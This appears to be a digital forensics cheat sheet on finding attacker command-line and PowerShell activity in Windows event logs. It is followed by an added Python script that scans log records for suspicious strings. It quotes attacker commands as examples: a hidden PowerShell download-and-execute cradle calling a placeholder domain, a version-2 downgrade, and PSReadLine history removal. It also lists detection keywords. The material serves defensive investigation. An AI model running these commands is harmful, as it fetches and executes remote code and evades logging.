Think of the terminal as the attacker's magic wand 🪄. The beauty for them is that they can do all sorts of nasty things remotely; the beauty for us lies in the forensic perks: the history of this activity can be reviewed.
🪵 Event Logs
It’s possible to track terminal activity starting from Windows Server 2012R2, but it is not enabled by default (too noisy) and has to be turned on: Computer Configuration -> Policies -> Admin Templates -> System -> Audit Process Creation. Once enabled, 4688 (process created, arguments logged) and 4689 (process exited) can show some of this activity. However, even if not enabled explicitly, some events will be logged anyway (suspicious scripts).
👵🏽 Windows XP: event 592 tracks process activity but logs no command arguments.
📕 ftp.exe -i -v -s:path\to\file\with\ip
📕 powershell -Version 2 -Command blahblah # downgrading the PowerShell instance to v2 with -Version 2
Your best bet is to first filter for unusual “family relations” (parent/child process pairs), like
🪵 Event logs:
🛡️ Microsoft-Windows-PowerShell%4Operational
🥝 Windows PowerShell.evtx (to track invocations of previous versions)
📞 Microsoft-Windows-WinRM/Operational for PS remoting (on both source and destination systems)
🫐 Also check .bash_history on Linux.
Turn on here: Group Policy Management -> Computer Configuration -> Policies -> Admin Templates -> Windows Components -> Windows PowerShell. When on, find them here 📂
📕 Set-PSReadLineOption
📕 Remove-Module -Name PSReadLine
Transcript logs (similar to 🫐 but they also record the output; not on by default). When 🍓 is on, they are stored at 📂 \Users\uname\Documents (by default). Turn on here: Computer Configuration -> Admin Templates -> Windows Components -> Windows PowerShell -> Turn on PowerShell Transcript logs.
| 🏺 Artefact | 🖥️ Comment |
|---|---|
| 🪵 Event logs | 🛡️ |
| 🗄️ Registry | ShimCache, BAM/DAM, AmCache ( |
✍️ Suspicious scripts are written to the logs as 4104 Warning events even when command-line auditing is off.
The attacker might use PowerShell for stealth.
📕 powershell -W Hidden -nop -noni -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://averylegitdomain/averylegitstring')
📕 Invoke-Obfuscation ...
✍️ Bad strings: download, IEX, rundll32.exe, http, StartProcess, InvokeExpression, Invoke-Command, syswow64, FromBase64String, powershell -Version, Invoke-WMIMethod, Invoke-CIMMethod, Reflection, WebClient, bitstransfer.
The attacker could also abuse %COMSPEC% (used to run cmd.exe) like this:
📕 %COMSPEC% /C start malicious_script.bat
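As an added example (not part of the original notes), a small triage script that runs the bad-strings list above, plus a few patterns for the downgrade, hidden-window, ftp script and %COMSPEC% tricks described on this page, over 4688 command lines and 4104 script blocks. The extra regexes and the sample event records are assumptions I constructed; only the command lines themselves come from the page.

```python
import re

# The page's "bad strings" list, matched case-insensitively.
BAD_STRINGS = ["download", "IEX", "rundll32.exe", "http", "StartProcess",
               "InvokeExpression", "Invoke-Command", "syswow64", "FromBase64String",
               "powershell -Version", "Invoke-WMIMethod", "Invoke-CIMMethod",
               "Reflection", "WebClient", "bitstransfer"]

# Assumed patterns (not from the page) for the specific tricks the notes describe.
EXTRA_PATTERNS = {
    "ps-downgrade":  re.compile(r"powershell(?:\.exe)?\s.*-v(?:ersion)?\s+2\b", re.I),
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "exec-bypass":   re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I),
    "comspec-abuse": re.compile(r"%COMSPEC%\s+/[CK]\b", re.I),
    "ftp-script":    re.compile(r"ftp(?:\.exe)?\s.*-s:", re.I),
}

def indicators(text):
    """Return the sorted list of indicators found in one command line or script block."""
    lowered = text.lower()
    hits = {s for s in BAD_STRINGS if s.lower() in lowered}
    hits |= {name for name, rx in EXTRA_PATTERNS.items() if rx.search(text)}
    return sorted(hits)

def triage(events):
    """events: list of (event_id, text); 4688 carries the command line, 4104 the script block.
    Returns [(event_id, indicators)] for every record with at least one hit, in input order."""
    flagged = []
    for event_id, text in events:
        hits = indicators(text)
        if hits:
            flagged.append((event_id, hits))
    return flagged

# Constructed sample records: the page's example commands plus one benign entry.
SAMPLE_EVENTS = [
    (4688, r"ftp.exe -i -v -s:C:\Users\Public\cmds.txt"),
    (4688, "powershell -Version 2 -Command blahblah"),
    (4104, "powershell -W Hidden -nop -noni -exec bypass IEX (New-Object Net.WebClient)"
           ".DownloadString('http://averylegitdomain/averylegitstring')"),
    (4688, "%COMSPEC% /C start malicious_script.bat"),
    (4688, r"C:\Windows\System32\notepad.exe C:\Users\alice\notes.txt"),
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS):
        print(event_id, hits)
```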